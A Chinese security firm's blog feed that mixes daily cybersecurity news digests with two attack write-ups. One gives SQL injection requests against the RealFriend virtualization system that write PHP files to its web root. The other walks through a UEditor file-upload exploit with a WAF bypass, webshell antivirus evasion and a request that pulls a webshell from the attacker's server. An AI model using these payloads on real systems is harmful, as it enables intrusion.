网络安全日报 2024年07月04日
1、Censys:仍有超过 38 万台主机引用恶意Polyfill域名
https://www.securityweek.com/over-380k-hosts-still-referencing-malicious-polyfill-domain-censys/ 攻击面管理公司 Censys 报告称,引用最近暂停的 polyfill.io 域的 JavaScript 脚本存在于超过 380,000 台暴露在互联网上的主机上。
2、英特尔称无需采取新的缓解措施来应对Indirector攻击
https://www.securityweek.com/intel-says-no-new-mitigations-required-for-indirector-cpu-attack/ 研究人员披露了一种名为 Indirector 的新型高精度分支目标注入攻击方法,但英特尔表示不需要采取新的缓解措施。
3、研究人员称,新勒索软件组织利用电话向受害者施压
https://therecord.media/ransomware-group-volcano-demon-lukalocker 研究人员发现了一个名为 Volcano Demon 的新勒索软件组织,该组织最近成功对制造业和物流行业的公司发动了两次攻击。这个勒索软件组织的有趣之处在于,它没有公开泄密网站,而是使用电话恐吓受害者组织的领导层并与他们协商付款。研究人员表示,这些电话来自身份不明的号码,通常带有威胁的语气。
4、报告发现网络安全已成为汽车行业最关注的问题
https://www.cybersecuritydive.com/news/cybersecurity-top-concern-auto-industry-rockwell-automation/720453/ 根据罗克韦尔自动化的一项调查,汽车和汽车供应制造商将网络安全列为他们最大的外部担忧。仅在 2023 年上半年,网络攻击就造成了 118 亿美元的损失。
5、Xbox 服务全球瘫痪,多个平台用户受影响
https://www.freebuf.com/news/405076.html 近日,Xbox Live 服务因重大故障而瘫痪,全球用户受到影响,无法登录 Xbox 账户和玩游戏。
6、Meta 的 "付费或同意 "数据模式违反欧盟法律
https://www.infosecurity-magazine.com/news/meta-pay-consent-data-breach/ 欧盟委员会的初步意见是,这家科技巨头的新做法不符合《数字市场法》(DMA)第 5(2)条的规定。该条款要求把关人在指定的核心平台服务和其他服务之间合并用户的个人数据时,必须征得用户的同意。如果用户拒绝同意,则应获得个性化程度较低但等效的替代服务。
7、利用云助手进行黑产攻击事件频发
https://www.secrss.com/articles/67624 微步情报局通过近期的威胁狩猎发现了多起利用具备“远控”功能的合法软件进行攻击的攻击事件,相关事件既包括真实的黑产攻击事件,也包括各类攻防演练活动相关的攻击事件。通过微步情报局的监测,相关被滥用的合法软件包括阿里云助手、长亭云助手、IP-Guard、山东固信、360云管理等软件。
8、日本动漫游戏巨头 Kadokawa 承认遭勒索攻击后数据泄露
https://therecord.media/japan-anime-giant-data-leak-ransomware 该公司在周六的一份声明中说,泄露的数据包括商业伙伴的信息,合同和其他文件,以及公司内部数据,如其子公司 Dwango 所有员工的个人信息,该公司运营着日本流行的视频共享网站 Niconico。
9、LockBit宣布攻击克罗地亚最大的医院 KBC-Zagreb
https://www.anquanke.com/post/id/297636 上周四,克罗地亚萨格勒布大学医院中心宣布遭受网络攻击,不到一周时间,该中心就被 LockBit 勒索软件组织占领。
10、CDK Global网络攻击导致美国汽车销售陷入瘫痪
https://www.anquanke.com/post/id/297626 CDK Global 网络攻击导致美国汽车行业陷入瘫痪已近两周,许多汽车销售网点仍在艰难恢复正常。CDK Global 网络攻击给经销商造成了数百万美元的损失。据CNN报道,网络汽车公司表示,此次网络攻击使得经销商难以跟踪客户互动、订单和销售情况。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
瑞友天翼应用虚拟化系统SQL注入漏洞
最近网上公开了一些瑞友天翼应用虚拟化系统的 SQL 注入漏洞,经过挖掘发现,还存在一些后台 SQL 注入漏洞。
重点关注传入参数可控并且拼接到 SQL 语句中的代码。
getappicon
首先检测了登录状态,然后将通过 GET 获取到的参数 id 直接拼接到 SQL 语句中。
GET /hmrao.php?s=/Admin/getappicon/&id=1');SELECT+SLEEP(5)+AND('1 HTTP/1.1
Host: 192.168.222.145
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0
Connection: close
我们打印出执行的 SQL 语句,发现成功闭合 SQL。
GET /hmrao.php?s=/Admin/getappicon/&id=1');select%20'<?php%20phpinfo();?>'%20into%20outfile%20%27C:\\Program%20Files%20(x86)\\RealFriend\\Rap%20Server\\WebRoot\\test1.php%27%23 HTTP/1.1
Host: 192.168.222.145
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0
Connection: close
成功将文件写到根目录下。
useredit
首先检测了登录状态,然后将通过 GET 获取到的参数 id 直接拼接到 SQL 语句中。
我们看到这里检测登录状态的函数是 adminchecklogin
这里进行检测时会根据路由 sessId 来进行检测,所有需要将cookie 拼接在路由器上。
GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2&uid=1');SELECT+SLEEP(5)%23 HTTP/1.1
Host: 192.168.222.145
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0
Connection: close
GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2&uid=1');select%20'<?php%20phpinfo();?>'%20into%20outfile%20%27C:\\Program%20Files%20(x86)\\RealFriend\\Rap%20Server\\WebRoot\\test2.php%27%23 HTTP/1.1
Host: 192.168.222.145
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0
Connection: close
成功将文件写到根目录下。
appedit
首先检测了登录状态,然后将通过 GET 获取到的参数 id 直接拼接到 SQL 语句中。
这里检测登录状态的函数同样也是 adminchecklogin
所以也需要将cookie 拼接在路由中。
GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2&id=0');select+sleep(5)%23 HTTP/1.1
Host: 192.168.222.145
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0
Connection: close
GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2&id=0');select%20'<?php%20phpinfo();?>'%20into%20outfile%20%27C:\\Program%20Files%20(x86)\\RealFriend\\Rap%20Server\\WebRoot\\test.php%27%23 HTTP/1.1
Host: 192.168.222.145
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0
Connection: close
成功将文件写到根目录下。
网络安全日报 2024年07月03日
1、新型Indirector侧信道攻击威胁英特尔CPU安全
https://www.bleepingcomputer.com/news/security/latest-intel-cpus-impacted-by-new-indirector-side-channel-attack/ 研究人员发现现代英特尔CPU,包括第12代和第13代酷睿处理器,面临Indirector侧信道攻击的威胁。Indirector攻击的机制包括利用iBranchLocator识别分支索引和标签,英特尔已获悉此攻击风险并提出缓解措施,研究人员将在8月举行的USENIX安全研讨会上展示Indirector攻击,目前已经在GitHub上发布了相关概念验证代码和工具。
2、虚假IT网站借Windows漏洞传播Vidar恶意软件
https://www.bleepingcomputer.com/news/security/fake-it-support-sites-push-malicious-powershell-scripts-as-windows-fixes/ 近日,网络安全研究人员发现了一系列虚假IT支持网站,这些网站宣传所谓的“修复”方案,针对Windows更新中常见的0x80070643错误。这些所谓的“解决方案”实际上是恶意PowerShell脚本,一旦执行,就会在用户设备上安装Vidar信息窃取恶意软件。这些虚假网站通过已被劫持的YouTube频道进行推广,以增加其可信度。研究人员警告用户,应避免从不
3、谷歌修复了25 个 Android漏洞,包括严重的提权漏洞
https://www.securityweek.com/google-patches-25-android-flaws-including-critical-privilege-escalation-bug/ 谷歌已发布针对 Android 操作系统中 25 个已记录安全漏洞的补丁,其中包括框架组件中的一个严重漏洞。该严重漏洞被标记为 CVE-2024-31320,影响 Android 12 和 12L 版本,允许攻击者提升易受攻击的设备上权限。
4、CapraRAT间谍软件伪装成热门应用瞄准 Android 用户
https://siliconangle.com/2024/07/01/sentinellabs-uncovers-new-caprarat-spyware-targeting-android-users/ 上市网络安全公司SentinelOne Inc.的研究部门 SentinelLabs 今天发布了一份新报告 ,警告称 CapraRAT 间谍软件再次兴起,通过恶意 Android 应用程序针对手机游戏玩家和武器爱好者进行攻击。
5、近4000人在国际执法打击网络诈骗网络的行动中被捕
https://therecord.media/4000-arrested-in-global-cybercrime-scam-crackdown-interpol 国际执法部门6月27日表示,他们捣毁了几个国家的在线诈骗网络,逮捕了3900多名嫌疑人,并没收了2.57亿美元的非法资产。
6、Infosys McCamish称被LockBit 窃取了600万人数据
https://www.bleepingcomputer.com/news/security/infosys-mccamish-says-lockbit-stole-data-of-6-million-people/ Infosys McCamish Systems (IMS) 透露,今年早些时候曾遭受 LockBit 勒索软件攻击,窃取了超过 600 万人的敏感信息。
7、可获root权限,思科NX-OS 零日漏洞修复已发布
https://www.freebuf.com/news/404980.html 思科修补了 4 月份曝出的 NX-OS 零日漏洞,威胁攻击者可以利用该漏洞在受影响的交换机上以 root 身份,安装未知恶意软件。
8、韩国ERP供应商的更新系统遭破坏并爆发恶意软件
https://www.theregister.com/2024/07/02/korean_erp_backdoor_malware_attack/ 据韩国网络安全公司 AhnLab 称,一家韩国 ERP 供应商的产品更新服务器遭到攻击者入侵,攻击者利用该服务器分发恶意软件而不是合法更新。
9、Splunk修补了企业产品中的高严重性漏洞
https://www.securityweek.com/splunk-patches-high-severity-vulnerabilities-in-enterprise-product/ Splunk 周一宣布修补 Splunk Enterprise 和 Cloud Platform 中的 16 个漏洞,其中包括 6 个高严重程度的漏洞。
10、强对抗的 SquidLoader 针对中国企业发起攻击
https://www.freebuf.com/articles/network/404478.html 研究人员近期发现了一种高对抗强度的 Loader,其通过钓鱼邮件附件传递给受害者。根据恶意软件所具备的引诱和规避行为,研究人员将其命名为 SquidLoader。SquidLoader 最早在 2024 年 4 月下旬被发现,但研究人员认为其至少已经活跃了一个月以上。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
喜报!蚁景科技荣获“双城铸盾”网络安全实战攻防演练三等奖
导语:蚁景科技在“双城铸盾”中山·江门网络安全实战攻防演练中表现突出,获”三等奖“殊荣。
近期,首届“双城铸盾”中山·江门网络安全实战攻防演练在中山启动,此次演练由中山与江门两地市委网信办、市委机要保密局、市政务服务数据管理局、市公安局联合举办,旨在提升两地的网络安全防护能力,强化网络安全实战人才培养。
本次演练组织了来自国内网络安全领域知名企业、研究所和高校的超70支专业攻击队伍参加,以中山、江门两市的600多个政务信息系统和重点领域企事业单位信息系统为靶标,开展为期5天的实战攻防。
在此次实战攻防演练中,蚁景科技派出技术能力过硬的攻击队全力投入,成功挖掘出多个重要的信息系统漏洞,展现了雄厚的网络安全技术实力。最终,蚁景科技凭借出色的渗透攻击策略和专业的实战技术能力,以总分2632分的成绩脱颖而出,荣获此次演练赛的“三等奖”。
此次“双城铸盾”网络安全实战攻防演练为蚁景科技提供了一个展示实力的舞台,同时也为公司积累了宝贵的实战演练经验。
蚁景科技作为网络安全领域的践行者,一直专注于网络安全实战人才的培养和技术研发。不仅提供前沿的网络安全技术培训,还注重实战能力的锻炼,确保学员能够真正掌握网络安全的核心技能。通过多年的网络安全实战人才培养和技术研发,蚁景科技已经积累了丰富的经验和资源。未来,将继续致力于网络安全事业的发展,为社会的网络安全贡献力量。
网络安全日报 2024年07月02日
1、OpenSSH发布安全更新及未来弃用DSA密钥计划
https://www.openssh.com/releasenotes.html OpenSSH项目团队7月1日发布了OpenSSH 9.8版本,其中修复了两个关键安全问题,包括一个影响sshd服务的严重漏洞(CVE-2021-32604)和一个逻辑错误ObscureKeystrokeTiming。此外,OpenSSH宣布计划于2025年初完全弃用DSA密钥,因其安全性已不再符合当前标准。新版本还引入了多项功能改进和错误修复,提高了SSH协议的安全性和用户体验。用户被建议尽快更新至最新版本,以确保其系统的安全性。
2、新型勒索软件Brain Cipher攻击印尼数据中心
https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/ 一款名为Brain Cipher的勒索软件对印度尼西亚的国家数据中心发起攻击,造成移民服务、护照管制等关键政府服务中断。该勒索软件团伙索要高达800万美元的门罗币作为解密赎金,并威胁若不支付将公开被盗数据。Brain Cipher基于泄露的LockBit 3.0源代码,但进行了定制化修改,包括加密文件名和创建特定的勒索信。此外,该团伙还启动了数据泄露网站
3、UAC-0184组织在DLL侧载分发XWorm远程访问木马
https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/ 研究人员发现一个名为UAC-0184的威胁行为体利用一种新的技术手段,通过DLL侧载和Python相关文件,针对乌克兰发动了恶意软件攻击活动。该活动使用了XWorm远程访问木马(RAT),通过伪装的诱饵文件和精心设计的PowerShell脚本进行传播。攻击者可能通过网络钓鱼或垃圾邮件传播带有ZIP附件的恶意软件。研究人员警告一旦设备被XWorm RAT感染,攻击者将获得远程访问权限,可能用于数据盗窃、DDoS攻击等恶
4、类似Mirai的僵尸网络利用漏洞攻击Zyxel NAS设备
https://hackread.com/mirai-botnet-zyxel-nas-devices-europe-ddos-attacks/ 研究人员近期揭露了一个与Mirai僵尸网络相似的新僵尸网络,它正针对两款已停产的Zyxel网络附加存储(NAS)设备发起攻击。2024年3月,漏洞研究部门已向Zyxel通报了NAS端点的三个严重安全漏洞。目前,这个僵尸网络正利用这些漏洞,将易受攻击的设备纳入其控制之下,这些设备一旦被攻陷,可能被用于对关键基础设施和企业进行DDoS攻击。研究人员建议Zyxel NAS的用户识别自己的设备型号和版本,对于存在漏洞的设备,应立即下载并安装最新的安全补丁,
5、MerkSpy间谍软件利微软Office漏洞渗透系统
https://www.fortinet.com/blog/threat-research/merkspy-exploiting-cve-2021-40444-to-infiltrate-systems 2024年6月27日,安全研究人员揭露了一起攻击活动,该活动利用了Microsoft Office中的CVE-2021-4044漏洞。攻击者通过伪装的Word文档传播MerkSpy间谍软件,该软件能够秘密监控用户行为、捕获敏感信息,并在受感染的系统上建立持久性。攻击流程包括下载恶意HTML文件、执行shellcode、解码注入MerkSpy间谍软件,以及将窃取的数据上传到远程服务器。研究人员
6、数百万 OpenSSH 服务器面临regreSSHion攻击
https://www.securityweek.com/millions-of-openssh-servers-potentially-vulnerable-to-remote-regresshion-attack/ 由于被追踪为 regreSSHion 和 CVE-2024-6387 的漏洞,数百万 OpenSSH 服务器可能容易受到未经身份验证的远程代码执行。
7、Google为新的KVM漏洞赏金计划提供最高25万美元奖励
https://www.securityweek.com/google-offering-250000-for-full-vm-escape-in-new-kvm-bug-bounty-program/ 谷歌宣布了一项新的漏洞赏金计划,对在基于内核的虚拟机 (KVM) 管理程序中发现的漏洞将提供丰厚的奖励。完整的虚拟机逃逸最高可获得 25 万美元的奖励。任意内存写入漏洞可获得 10 万美元,任意内存读取漏洞或相对内存写入漏洞可获得 5 万美元。DoS 攻击最高可获得 2 万美元,相对内存读取漏洞最高可获得 1 万美元。
8、影响大量路由器,Juniper曝严重的“身份验证”漏洞
https://www.freebuf.com/news/404900.html 近日,Juniper Networks被曝存在一个极其严重的“身份验证”漏洞,对Session Smart 路由器(SSR)、Session Smart Conductor和WAN Assurance 路由器等产品造成比较明显的影响。目前,Juniper已紧急发布了相应的漏洞补丁,用户可及时进行系统更新。
9、CocoaPods中的严重漏洞可导致数百万苹果应用遭供应链攻击
https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html Swift 和 Objective-C Cocoa 项目的CocoaPods依赖管理器中发现了三个安全漏洞,可能被利用来发起软件供应链攻击,使下游客户面临严重风险。EVA 信息安全研究人员 Reef Spektor 和 Eran Vaknin在今天发布的一份报告中表示,这些漏洞允许“任何恶意行为者声称拥有数千个无人认领的 pod,并将恶意代码插入许多最受欢迎的 iOS 和 macOS 应用程序中”。
10、报告称75% 的新漏洞在 19 天内被利用,每周600个新漏洞
https://www.helpnetsecurity.com/2024/06/27/nvd-vulnerabilities/ 去年,Skybox Security 报告称,新漏洞超过 30,000 个,平均每 17 分钟就会出现一个新漏洞。这相当于每周出现约 600 个新漏洞。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年07月01日
1、安卓版Chrome浏览器测试新的身份信息验证功能
https://source.android.com/docs/security/features/identity-credentials 谷歌正在为Android版的Chrome浏览器测试一项名为“数字凭证 API”的新功能,该功能允许网站安全地请求存储在移动钱包中的身份信息。根据Google的官方文档,Identity Credential API提供了一个接口,可以访问一个安全存储区,该存储区存储着现实世界的身份证明文件,包括可以是护照、驾驶执照、或者用户上传的任何其他身份证明文件。目前尚不清楚该功能何时可正式推出,谷歌仍在试验该想法。
2、Fortra FileCatalyst工作流应用存在严重SQL注入漏洞
https://www.fortra.com/security/advisory/fi-2024-008 工作流传输应用Fortra FileCatalyst Workflow存在严重的安全漏洞,该漏洞允许攻击者通过工作流Web应用程序的各个URL端点中的JOBID参数执行SQLi,修改包括创建管理用户以及删除或修改应用程序数据库中的数据。该漏洞编号为CVE-2024-5276,CVSS评分为9.8,它影响FileCatalyst Workflow版本5.1.6 Build135及更早版本。该漏洞已在版本5.1.6 build139中得到解决。
3、CISA警告大多数开源项目未使用内存安全代码
https://www.cisa.gov/sites/default/files/2024-06/joint-guidance-exploring-memory-safety-in-critical-open-source-projects-508c.pdf 美国网络安全和基础设施安全局(CISA)澳大利亚(ASD、ACSC)和加拿大组织(CCCS)共同签署了一项研究报告,调查了172个知名的开源项目是否容易受到内存安全缺陷的影响。内存安全语言是旨在防止常见内存相关错误(例如缓冲区溢出、释放后使用和其他类型的内存损坏)的编程语言。相关研究项目是对2023年12月发布的“内存安全路线图案例”的
4、新型信用卡网络盗刷器针对多款内容管理系统目标
https://blog.sucuri.net/2024/06/caesar-cipher-skimmer.html 研究人员发现名为Caesar Cipher Skimmer的新型信用卡网络盗刷器已将WordPress、Magento和OpenCart等多个内容管理系统(CMS)平台作为攻击目标,信用卡网络盗刷器是指注入电子商务网站以窃取财务和支付信息的恶意软件。攻击者对包括与WordPress的WooCommerce插件相关的结帐PHP文件(“form-checkout.php”)进行恶意修改,以窃取信用卡详细信息。
5、TeamViewer检测到内部IT环境疑似遭到入侵
https://thehackernews.com/2024/06/teamviewer-detects-security-breach-in.html TeamViewer公司在一份声明中表示在2024年6月26日检测到其内部IT环境在“异常”,并立即启动了响应团队和响应程序。该公司进一步指出,其企业IT环境与产品环境完全隔绝,没有证据表明任何客户数据因该事件受到影响,目前正与全球知名的网络安全专家团队一起展开调查,并实施了必要的补救措施。TeamViewer公司没有透露此次入侵背后的黑手和如何实施的细节,但表示正在进行调查,并将在获得新信息时及时更新。
6、BlackSuit勒索组织声称对KADOKAWA发动攻击
https://tp.kadokawa.co.jp/.assets/240627_release_en_wD9vY5XU.pdf BlackSuit勒索软件团伙声称最近对KADOKAWA公司发动了网络攻击,KADOKAWA是一家日本媒体集团,旗下经营着多家电影、出版和游戏行业的公司。KADOKAWA公司报告称由于6月8日遭受的网络攻击,集团的多个网站目前正在经历服务中断,该事件影响了该公司及其子公司的大部分业务,因为它们托管在同一个数据中心,这些数据中心被勒索软件加密。BlackSuit勒索软件团伙威胁说如果不支付赎金,他们将公布被盗数据。
7、GitLab严重漏洞允许以任何用户权限运行管道
https://about.gitlab.com/releases/2024/06/26/patch-release-gitlab-17-1-1-released/#run-pipelines-as-any-user 影响GitLab社区版和企业版产品的某些版本存在的严重漏洞可被攻击者利用以任何用户的身份运行管道功能。GitLab是一款流行的基于Web的开源软件项目管理和工作跟踪平台,据估计拥有100万活跃的许可用户。安全漏洞编号为CVE-2024-5655,严重程度评分为9.6(满分10分),GitLab管道是持续集成/持续部署(CI/CD)系统的一项功能,用户能够自动并行或按顺序运行流程
8、Kimsuky组织使用恶意Chrome扩展窃取数据
https://www.zscaler.com/blogs/security-research/kimsuky-deploys-translatext-target-south-korean-academia APT组织Kimsuky使用名为TRANSLATEXT的新恶意Google Chrome扩展程序窃取敏感信息进行情报收集工作。TRANSLATEXT扩展程序伪装成Google翻译,它整合了JavaScript代码以绕过Google、Kakao和Naver等服务的安全措施,窃取电子邮件地址、用户名、密码、cookie,还可以从Blogger Blogspot URL获取命令,以便截取新打
9、SnailLoad侧信道攻击利用延迟推断用户网络活动
https://snailload.com/ 研究人员发现了一种名为SnailLoad的新型侧信道攻击,可用于远程推断用户的网络活动。这一安全问题存在于所有的互联网连接中,通过利用网络数据包的延迟,攻击者能够推断其他人互联网连接上的当前网络活动,包括使用此信息推断用户访问的网站或用户观看的视频。该攻击方法的一个显著特点是,它无需进行中间人(AitM)攻击或在物理上接Wi-Fi 连接来嗅探网络流量,而是诱骗目标从威胁行为体控制的服务器加载无害资产(例如文件、图像或广告),然后利用受害者的网络延迟作为侧信道来确定受害者系统上的网络活动。研究人员表示,OpenWrt社区以及360、华为、Links
10、Google浏览器将于11月起屏蔽Entrust证书
https://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html 谷歌宣布,将从2024年11月1日左右开始在其Chrome浏览器127版及更高版本开始屏蔽使用Entrust证书的网站,理由是这些网站不符合合规性,且该证书颁发机构无法及时解决安全问题。过去几年中,公开披露的事件报告突显了Entrust的一系列令人担忧的行为,这些行为未能达到安全预期,并且削弱了人们对其作为公众信任的证书颁发机构所有者的能力、可靠性和诚信的信心。预计屏蔽措施将涵盖Windows、macOS、ChromeOS、
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记某次攻防演练:大战UEditor并突破
前言
最近参与某次攻防演练,通过前期信息收集,发现某靶标单位存在某域名备案。
通过fofa搜索子域名站点,发现存在一个子域名的61000端口开放着一个后台,于是开始进行渗透。
目录扫描
进行目录扫描吗,发现/bin.rar路径可以访问到一个压缩文件。
使用下载器下载到电脑,打开压缩包,猜测内容为站点源代码,代码为.net形式,使用c#语言编写。
C#代码经过编译后为dll文件形式,根据dll文件命名规则和.net类型代码格式。我们可以初步判定xxx.Application.Web.dll文件中存在主要的后端逻辑代码。
但是dll为二进制文件我们无法直接查看,因此需要使用dnspy进行反编译查看。
查看方法:将dll文件丢入dnspy即可。
UEditor的曲折利用
在源码中发现该系统使用UEditor。
可得UEditor的路径/Utility/UEditor/controller.ashx
访问关键接口/Utility/UEditor/?action=catchimage和/Utility/UEditor/?action=config
然而服务器返回403无法访问。
通过Fuzz发现403的原因是有可能是因为waf或者edr的拦截。
使用/Utility/UEditor/.css?action=catchimage可进行bypass,成功访问关键接口。
接下来就是参考UEditor .net版本的任意文件上传漏洞进行上传哥斯拉jsp webshell。
漏洞利用参考链接:
https://www.freebuf.com/vuls/181814.html上传过程中发现普通哥斯拉jsp webshell上传后就被杀软拦截无法访问。
于是用https://github.com/Tas9er/ByPassGodzilla项目对webshell进行免杀处理。
方可成功上传webshell并进行连接,至此该UEditor站点利用完成,后面就是愉快的打内网。
UEditor的简便利用
传统的UEditor利用都是本地编写一个html文件中包含一个表单,通过提交表单使目标服务器根据提交的图片马地址下载webshell。
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<inputtype="submit" value="Submit" />
</form>
原理还是通过http请求发送图片马地址,所以直接在burpsuite发包也可以达到相同的效果,省去制作html文件的步骤。
POST /替换漏洞URL地址拼接/UEditor/controller.ashx?action=catchimage HTTP/1.1
Host: x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
source[]=http://替换为自己服务器开启http服务的URL地址/666.jpg?.aspx
请求发送后,返回包返回webshell路径。
总结
UEditor作为热门常见漏洞,在大型企业集团中的.net老旧系统中非常常见,相关的利用方法以及绕过方法需要非常熟练,方可快人一步迅速拿下权限;
在渗透测试过程中,我们可能会遇到一些与实验环境或他人分享的情况不同的挑战。这时,我们需要具备排查问题原因的能力。例如,在利用漏洞的过程中,可能会遇到无法上传webshell或请求被WAF拦截等情况。我们需要根据场景,修改payload或使用fuzz等技术进行绕过,直到成功利用漏洞并获取所需的权限,完成渗透。大战UEditor并突破。
网络安全日报 2024年06月28日
1、T-Mobile称泄露数据源自于其第三方供应商
https://www.bleepingcomputer.com/news/security/t-mobile-denies-it-was-hacked-links-leaked-data-to-vendor-breach/名为IntelBroker的攻击组织声称已窃取并正在出售德国电信公司T-Mobile的数据,并在黑客论坛上发布了几个截图显示攻击者能够以管理权限访问Confluence服务器和公司内部供开发人员使用的Slack频道,威胁行为体将他们出售的数据内容描述为“源代码、SQL 文件、图像、Terraform数据、t-mobile.com认证、Siloprograms”。T-Mobi
2、FBI警告伪装成律师事务所咨询服务的加密货币骗局
https://www.ic3.gov/Media/Y2024/PSA240624联邦调查局警告称网络犯罪分子冒充律师事务所和律师向投资诈骗的受害者提供加密货币追回服务,意图窃取资金和个人信息。诈骗者声称与美国联邦调查局、消费者金融保护局(CFPB)等政府机构有合作欺骗受害者信任,诈骗分子常见的谎言包括:要求受害者提供个人或银行信息以取回他们的钱。要求受害者预先支付部分费用,并在收回资金时支付余额。指示受害者补缴税款和其他费用以收回他们的资金。
3、安卓版Chrome浏览器测试新的身份信息验证功能
https://source.android.com/docs/security/features/identity-credentials谷歌正在为Android版的Chrome浏览器测试一项名为“数字凭证 API”的新功能,该功能允许网站安全地请求存储在移动钱包中的身份信息。根据Google的官方文档,Identity Credential API提供了一个接口,可以访问一个安全存储区,该存储区存储着现实世界的身份证明文件,包括可以是护照、驾驶执照、或者用户上传的任何其他身份证明文件。目前尚不清楚该功能何时可正式推出,谷歌仍在试验该想法。
4、Fortra FileCatalyst工作流应用存在严重SQL注入漏洞
https://www.fortra.com/security/advisory/fi-2024-008工作流传输应用Fortra FileCatalyst Workflow存在严重的安全漏洞,该漏洞允许攻击者通过工作流Web应用程序的各个URL端点中的JOBID参数执行SQLi,修改包括创建管理用户以及删除或修改应用程序数据库中的数据。该漏洞编号为CVE-2024-5276,CVSS评分为9.8,它影响FileCatalyst Workflow版本5.1.6 Build135及更早版本。该漏洞已在版本5.1.6 build139中得到解决。
5、苹果修复AirPods产品中可能导致窃听的蓝牙漏洞
